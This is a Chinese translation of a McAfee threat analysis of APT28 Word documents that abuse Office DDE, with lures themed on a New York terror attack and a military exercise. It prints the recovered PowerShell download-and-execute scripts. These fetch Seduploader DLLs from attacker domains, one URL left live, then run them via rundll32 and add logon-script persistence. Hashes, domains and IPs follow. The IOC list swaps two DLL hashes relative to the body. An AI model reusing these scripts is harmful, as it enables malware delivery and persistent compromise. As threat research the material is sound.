APT28 利用 NYC 恐怖袭击事件传播 Office DDE 恶意文档

在监视APT28威胁组织活动的过程中,McAfee Advanced Threat Research分析人员发现了一个恶意Word文档,该文档利用了Microsoft Office动态数据交换(DDE)技术。这是第一次观察到 APT28 使用该技术。结合PowerShell 使用 DDE 能使攻击者在受害者系统上执行任意代码,而不管是否启用了宏。(FreeBuf Office DDEAUTO技术分析报告

APT28,又称Fancy Bear等,擅长利用不同热点事件进行攻击。这里,它利用纽约市最近发生的恐怖袭击事件。文档本身是空白的,一旦被打开,文档会与一个控制服务器通信,将第一阶段的恶意软件Seduploader下载到受害者的系统上。

涉及Seduploader的域名创建于10月19日,比Seduploader的创建早11天。

我们检查的文件:

文件名:IsisAttackInNewYork.docx

Sha1: 1c6c700ceebfbe799e115582665105caa03c5c9e

创建日期:2017-10-27T22:23:00Z

该文档使用Office中最近发现的DDE技术来调用cmd来运行两个命令的PowerShell。首先:

C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-NoP -sta -NonI -W Hidden $e=(New-ObjectSystem.Net.WebClient).DownloadString(‘hxxp://netmediaresources[.]com/config.txt’);powershell-enc $e #.EXE

第二个PowerShell命令是Base64编码的,可以从远程服务器接收到的config.txt中找到。解码后如下:

$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+”\vms.dll”);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$W.DownloadFile(“hxxp://netmediaresources[.]com/media/resource/vms.dll “,$p);
if (Test-Path $p){
    $rd_p=$Env:SYSTEMROOT+”\System32\rundll32.exe”;
    $p_a=$p+”,#1″;
    $pr=Start-Process $rd_p -ArgumentList $p_a;
    $p_bat=($Env:ALLUSERSPROFILE+”\vms.bat”);
    $text=’set inst_pck = “%ALLUSERSPROFILE%\vms.dll”‘+”`r`n”+’if NOT exist %inst_pck % (exit)’+”`r`n”+’start rundll32.exe %inst_pck %,#1’
    [io.File]::WriteAllText($p_bat,$text)
    New-Item -Path ‘HKCU:\Environment’ -Force | Out-Null;
    New-ItemProperty -Path ‘HKCU:\Environment’ -Name ‘UserInitMprLogonScript’ -Value “$p_bat” -PropertyType String -Force | Out-Null;
}

PowerShell脚本从这个URL下载Seduploader:

hxxp://netmediaresources[.]com/media/resource/vms.dll

Seduploader样本包含以下文件:

文件名:vms.dll

Sha1:4bc722a9b0492a50bd86a1341f02c74c0d773db7

编译日期:2017-10-31 20:11:10

控制服务器:webviewres[.]net

该文件会下载Seduploader第一阶段的侦察植入版本,里面有可能的受害者,将受感染主机的基本系统信息提供给攻击者。如果系统确认为目标,那么下一步通常会安装X-Agent或Sedreco。

我们从公开报道中获悉,近年来APT28经常使用Seduploader作为第一阶段的负载。结合事件中观察到的最近的负载结构代码分析,我们发现它们与APT28之前采用的Seduploader样本相同。

我们将与此事件相关的控制服务器域名标识为webviewres[.]net,这与APT28以前的域名注册套路一致,具有欺骗性与迷惑性。该域名于10月25日注册,是负载和恶意文件创建的前几天。域名在10月29日首次激活,也是这个版本的Seduploader被编译的前几天。目前该域名的IP解析为185.216.35.26,托管在域名服务器ns1.njal.la和ns2.njal.la上。

随后McAfee研究确定以下相关样本:

文件名:secnt.dll

Sha1:ab354807e687993fbeb1b325eb6e4ab38d428a1e

编译日期:2017-10-30 23:53:02

控制服务器:satellitedeluxpanorama[.]com(此域名与上述域名的域名服务器相同)

上述两个样本很可能属于同一个系列。据分析,它使用相同的技术和负载。我们可以准确地确定,涉及使用DDE技术的文档事件始于10月25日。

植入secnt.dll的域名satellitedeluxpanorama[.]com在11月5日解析到89.34.111.160。恶意文档68c2809560c7623d2307d8797691abf3eafe319a负责释放Seduploader负载(secnt.dll)。它的原始文件名是SabreGuardian2017.docx,创建于10月27日,来自hxxp://sendmevideo[.]org/SabreGuardian2017.docx。该文件调用sendmevideo[.]org/dh2025e/eh.dll下载Seduploader(ab354807e687993fbeb1b325eb6e4ab38d428a1e)。

此文档中嵌入的PowerShell命令:

$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+”\mvdrt.dll”);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$W.DownloadFile(“http://sendmevideo.org/dh2025e/eh.dll”,$p);
if (Test-Path $p){
    $rd_p=$Env:SYSTEMROOT+”\System32\rundll32.exe”;
    $p_a=$p+”,#1″;
    $pr=Start-Process $rd_p -ArgumentList $p_a;
    $p_bat=($Env:ALLUSERSPROFILE+”\mvdrt.bat”);
    $text=’set inst_pck = “%ALLUSERSPROFILE%\mvdrt.dll”‘+”`r`n”+’if NOT exist %inst_pck % (exit)’+”`r`n”+’start rundll32.exe %inst_pck %,#1’
    [io.File]::WriteAllText($p_bat,$text)
    New-Item -Path ‘HKCU:\Environment’ -Force | Out-Null;
    New-ItemProperty -Path ‘HKCU:\Environment’ -Name ‘UserInitMprLogonScript’ -Value “$p_bat” -PropertyType String -Force | Out-Null;
}

文件vms.dll(4bc722a9b0492a50bd86a1341f02c74c0d773db7)与secnt.dll(ab354807e687993fbeb1b325eb6e4ab38d428a1e)有99%的相似度,意味着它们代码几乎相同,很可能是同一事件的一部分。此外,根据代码分析,样本4bc722a9b0492a50bd86a1341f02c74c0d773db7与DLL植入8a68f26d01372114f660e32ac4c9117e5d0577f1具有99%的相似度,后者被用于针对网络会议Cy Con US的诈骗。

两个事件中的攻击技巧不同:欺骗Cy Con US会议的事件使用文档来执行恶意VBA脚本;这个使用恐怖主题的事件使用文档中的DDE执行PowerShell并从分发站点获取远程负载。但是,这两个事件中的负载都是相同的。

结论

APT28资源丰富,不仅能利用最近的事件诱使潜在的受害者感染,还能迅速采用新技术来助其成功。考虑到Cy Con US事件在媒体上的大量报道,APT28可能不再使用过去的VBA脚本,而是选择了DDE技术来绕过网络防御。最后,利用近期的国内事件和美国著名的防俄罗斯侵略的军事演习,突显出APT28有能力和有兴趣利用地缘政治事件进行作战。

涉及指标

SHA1 哈希

ab354807e687993fbeb1b325eb6e4ab38d428a1e(vms.dll, Seduploader)
4bc722a9b0492a50bd86a1341f02c74c0d773db7(secnt.dll, Seduploader)
1c6c700ceebfbe799e115582665105caa03c5c9e(IsisAttackInNewYork.docx)
68c2809560c7623d2307d8797691abf3eafe319a(SaberGuardian.docx)

域名

webviewres[.]net
netmediaresources[.]com

IP

185.216.35.26
89.34.111.160

McAfee coverage

McAfee产品将这种威胁命名为RDN/Generic Downloader.x。

*来源:McAfee,wzhi翻译,翻译时间2017/11/09,转载请注明来自91TFBOYS.COM

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据